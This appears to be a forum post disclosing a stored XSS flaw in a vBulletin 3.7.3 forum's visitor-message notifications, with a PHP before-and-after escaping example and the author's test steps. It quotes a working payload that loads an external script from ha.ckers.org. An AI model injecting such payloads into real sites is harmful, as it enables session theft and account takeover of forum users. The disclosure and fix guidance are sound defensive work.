THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME.
@ admin (shabbir)
Please don't ban me for this, because I have not used this hack for any illegal / harmful purposes. (You can check all records.) I have just tested an exploit and found it positive. Please fix it soon. I am writing this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage.
Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.
First, we must check the version of vBulletin used by G4EF:
(1) Open any page such as your user control panel.
(2) View the page-source.
(3) You discover this:
<style type="text/css" id="vbulletin_css">
* vBulletin 3.7.3 CSS
* Style: 'Default Style'; Style ID: 1
The vulnerability:
When vBulletin is used with the "Visitor Messages" add-on, an attacker can execute external script through a stored XSS vulnerability. When a visitor message containing script is posted, its text is run through htmlentities() before being displayed to the general public / forum members, so the public profile page is safe. However, posting a new message also sends a notification to the recipient of the message, and that notification is built from the raw, unencoded message text. When the recipient visits usercp.php (User Control Panel), he is hit with the unfiltered XSS attack, running under the forum's own domain.
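To make the defect concrete for whoever fixes it, here is a small PHP illustration of the two output paths described above. This is an added example, not vBulletin's own code or templates; the function names, the notification markup and the sample inputs are all made up for the illustration. The point it shows is that escaping on one output path (the public profile) does nothing for a second output path (the notification in usercp.php) unless that path escapes too.

```php
<?php
// Added example, not vBulletin code. Both functions take the raw text of a
// visitor message exactly as it is stored in the database.

// "Before": the notification line shown on usercp.php is built by plain
// string concatenation with no encoding, so a message body that contains
// <script ...> reaches the recipient's browser as live markup. This is the
// unfiltered path the report describes (hypothetical function name).
function render_notification_vulnerable(string $sender, string $message): string
{
    return '<div class="notification">New visitor message from ' . $sender
         . ': ' . $message . '</div>';
}

// "After": every untrusted field is encoded at the point of output, the same
// way the public profile page already does it. ENT_QUOTES also covers the
// case where the value ends up inside an HTML attribute.
function render_notification_fixed(string $sender, string $message): string
{
    $enc = static function (string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    };
    return '<div class="notification">New visitor message from ' . $enc($sender)
         . ': ' . $enc($message) . '</div>';
}

// Constructed sample input: the sender name and the test payload quoted in
// this report, used here only to show that the fixed path neutralises it.
$sender  = '_H4X0R_';
$payload = '<SCRIPT SRC=http://ha.ckers.org/xss.js>';

echo render_notification_vulnerable($sender, $payload), PHP_EOL;
echo render_notification_fixed($sender, $payload), PHP_EOL;

// A minimal regression check a maintainer could keep in the test suite:
// the encoded output must not contain a raw tag, only its escaped form.
$out = render_notification_fixed($sender, $payload);
assert(strpos($out, '<SCRIPT') === false);
assert(strpos($out, '&lt;SCRIPT') !== false);
```

The practical lesson for the fix is that encoding has to be applied in every template that renders the message text (profile page, user control panel notification, any e-mail or popup that quotes it), and applied at output time rather than once at storage time, otherwise a second rendering path can silently reintroduce the problem.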
How I tested it:
(1) I opened a duplicate account: _H4X0R_, which I request shabbir to kindly delete now.
(2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
(3) I logged out.
(4) I logged in as _H4X0R_.
(5) Opened my user control panel: usercp.php.
(6) Whoa!! XSS successful!
Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.
I think I deserve some good reputation points and/or some rewards for this!
Sorry, shabbir, for using a duplicate account, but you may delete it now. You should also understand that this was important for the security of the forum, so please don't ban me.